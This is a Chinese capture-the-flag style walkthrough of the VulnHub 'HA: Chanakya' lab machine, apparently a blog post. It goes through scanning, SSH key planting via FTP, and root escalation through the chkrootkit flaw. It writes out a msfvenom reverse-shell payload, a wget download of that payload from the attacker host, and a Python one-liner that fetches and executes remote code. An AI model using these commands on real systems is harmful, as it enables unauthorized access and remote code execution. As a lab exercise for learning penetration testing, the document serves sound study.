zoukankan      html  css  js  c++  java
  • chanakya

    仅供个人娱乐

    参考http://www.saulgoodman.cn/HA-Chanakya.html

    靶机信息

    https://www.vulnhub.com/entry/ha-chanakya,395/

    一、主机探测

    arp-scan -l

    nmap -sV -p 1-65535 -A 192.168.236.136

    dirb http://192.168.236.136

    二、漏洞的查找和利用

    百度   得到ROT13的加密方式

    pcap流量包,直接下载即可

    ashoka                             kautilya

    首先进行21端口登录

    22端口登陆失败

    创建ssh-keygen

    上传.ssh 使用kali免密登录

    ssh-keygen

    然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中

    root@kali:~/桌面# cd ~/.ssh

    root@kali:~/.ssh# cat id_rsa.pub > authorized_keys

    mkdir .ssh

    cd.ssh

    put authorized_keys

    root@kali:~/.ssh# ssh ashoka@192.168.236.136

    提权

    先msf生成一个木马反弹一个meterpreter回话过来

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf

    python -m SimpleHTTPServer

    msfconsole

    use exploit/multi/handler

    set payload linux/x86/meterpreter/reverse_tcp

    set lport 4444

    set lhost 192.168.236.129

    cd /tmp

    wget http://192.168.236.129:8000/shell.elf

    sysinfo

    使用post模块来查看可以利用那些提权exploit:

    run post/multi/recon/local_exploit_suggester

    info exploit/linux/local/netfilter_priv_esc_ipv4

    失败

    使用命令注入来反弹一个shell:

    use exploit/multi/script/web_delivery

    set lhost 192.168.236.129

    python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.236.129:8080/m9eTnBmiM');exec(r.read());"

    在目标机运行:

    使用rootkit攻击模块:

    这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。

    set rhosts 192.168.236.136

    set session 1

    set lport 8888

    exploit

    python -c'import pty;pty.spawn("/bin/bash")'

    参考文章http://www.saulgoodman.cn/HA-Chanakya.html

  • 相关阅读:
    [python]windows截图
    [python]PyPI使用国内源
    [MySQL]配置多个MySQL服务(Windows)
    [C#]中获取当前程序运行路径的方法
    [C#]统计文本文件txt中的行数(快速读取)
    [C#]获取连接MySql数据库及常用的CRUD操作
    html和css高级
    html和css进阶
    html和css入门
    Git 简介
  • 原文地址:https://www.cnblogs.com/bingtang123/p/13111695.html
Copyright © 2011-2022 走看看